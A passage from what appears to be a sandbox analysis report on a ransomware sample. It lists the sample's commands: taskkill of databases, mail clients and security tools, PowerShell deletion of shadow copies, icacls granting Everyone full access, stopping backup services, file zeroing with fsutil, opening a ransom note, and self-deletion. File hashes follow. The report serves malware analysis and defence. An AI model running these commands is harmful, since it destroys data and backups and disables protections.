- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.7.0.342⤵
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe2⤵
- Deletes itself
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "395958801-8933661151793810850-158212092081090685311883140302228880-203348247"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1164146697-1757351519121954960-1598656531-194259269417710956351476371403917931529"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1872053314-1445472940324293419-21159644872012361511644811687233454261014497176"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1997061358-1814872304457674714-448730642926788787392561543676311-1022516745"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11808829151551623970477387295749141643-152999599157424081418553353751668623076"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1806817180-324525989-1350126046-42631602711286792791551640673-355785847-591603542"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1349524300-264491354-422650865-170000379-12372704311559823258693977574273300569"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2284102851750714218-17956263341356059538-68260397-1688964880437469013-1505944464"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-367323984289478961-400712025-5575469-1897964322-1857134293-1298701124-1890941733"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1101567333-772160772-62232171180505311-1027584156-493040275-8296030121660249177"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-137596843016207695801466659247-788240315-1946335369-172572203719260333741454974235"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "901099379-1722020870805074732-851632885-1456233066-674386539-1419802802-1527311146"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "189307140238978187249660684893735857661344639-1720596160-2053468275-857941555"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-844076941-1092393732-1850109459-17565218082059912405-815250841-1429742881-713413756"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-68735326-5056036131313275624-2291945142893465241538636704-467938199613081133"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "683111131349876665-339622279-2105309224149161751542262906-987451766894225895"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "880083956-160111875-19419675551522892634-4900239171820484090-8918060321846682791"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1409441447-166358734011141505841170503562-53167424812792674551949113955417370641"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11503997201525866783-2636398131806831343596679775-19656487391909011136-770565243"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1750091196-1541920400-2012754478-321385066-875635047-322969583-18022786051186940972"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "893441057-1530893456-352293957-1559822984-419533987-457585707769182777-1306135271"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1856244861-16479583311265349185-11306903041158274405-1576223994-3688727521460863706"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "244172938-1898520942810559031145472652-12320168231070488151-770320977-1578820010"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1518877750-1753057878-2920150211223463562-1176132614-4931925167650328561741883803"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-56209806-99784166420517067981251393499782245764148889861711332975201400665353"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
58KB
MD56045baccf49e1eba0e674945311a06e6
SHA1379c6234849eecede26fad192c2ee59e0f0221cb
SHA25665830a65cb913bee83258e4ac3e140faf131e7eb084d39f7020c7acc825b0a58
SHA512da32af6a730884e73956e4eb6bff61a1326b3ef8ba0a213b5b4aad6de4fbd471b3550b6ac2110f1d0b2091e33c70d44e498f897376f8e1998b1d2afac789abeb
-
Filesize
342B
MD506fcadd4009c49c3d024e7c3ff9ab157
SHA13540d151afcad25a99889ce1e4bf96c974ec8d61
SHA2565c4fa483a4aabfb34e53df4d44f76a9357e9da74394d0bb6f2cc692e929daea7
SHA512902eb5d61b0b06d2e5ac6fc946fb389e75c802f8b6128eb14b59b217d9af7fe4f55784141ee27a1fa37418f8f12c775e1141abf7401b4220e4fbd8fc9dc18bb9
-
Filesize
2KB
MD5063a2b596f25a80d12bc29c8809d01db
SHA13c953fbcf110a6d0d8e5bf85b836906a43d500d4
SHA25696e37cb15d0e47409c388c549336051976f082e29149f8503ace4be3069728ad
SHA5121edd687b2dc4886ff9a060bbea692204244efc6405c3a07b5fa5500afafb74a08879f6f7648c26cc5528adfe0eb5830a4badcb931a8a173c60f5e80b4f74d550
-
Filesize
815KB
MD5c590a84b8c72cf18f35ae166f815c9df
SHA1b97761358338e640a31eef5e5c5773b633890914
SHA25657492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4
SHA512dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018
-
Filesize
5KB
MD5a41b4f125c422116c63994583cb8d3db
SHA14df39e689197f328fed0b49c8c55d36e11aa8076
SHA25607267f566df694c5e4e15054a5c4d332f679b52bf9fccaf30c5aa7de1af708e8
SHA512894b1c4b6c12dbde098496ed0b3180975860c354c188e0a42a2c8f985efd12b2e163bbc2188d13edc01c40502845773167e15ba92ee6abd2219aceea1c84a859
-
Filesize
4KB
MD5821740b3797047b94157666cc0f3455b
SHA150badabfff08e6c51c89f528a5ffa2123356e901
SHA256f19472eb84d7a81e50f907127c9f18cdc0a1c5ddfe974513d98837f8ae2a5578
SHA5124d03c538a64a8ea34cdc99fab14584e43c9d237dbc06682d2be5c0b9a5b9a0f9d2c2e9e86131589d1d767536c2b65d02c992290cb4d7cccbe2e8cd68e54a547d
-
-
-
-
-
-
Filesize
8KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB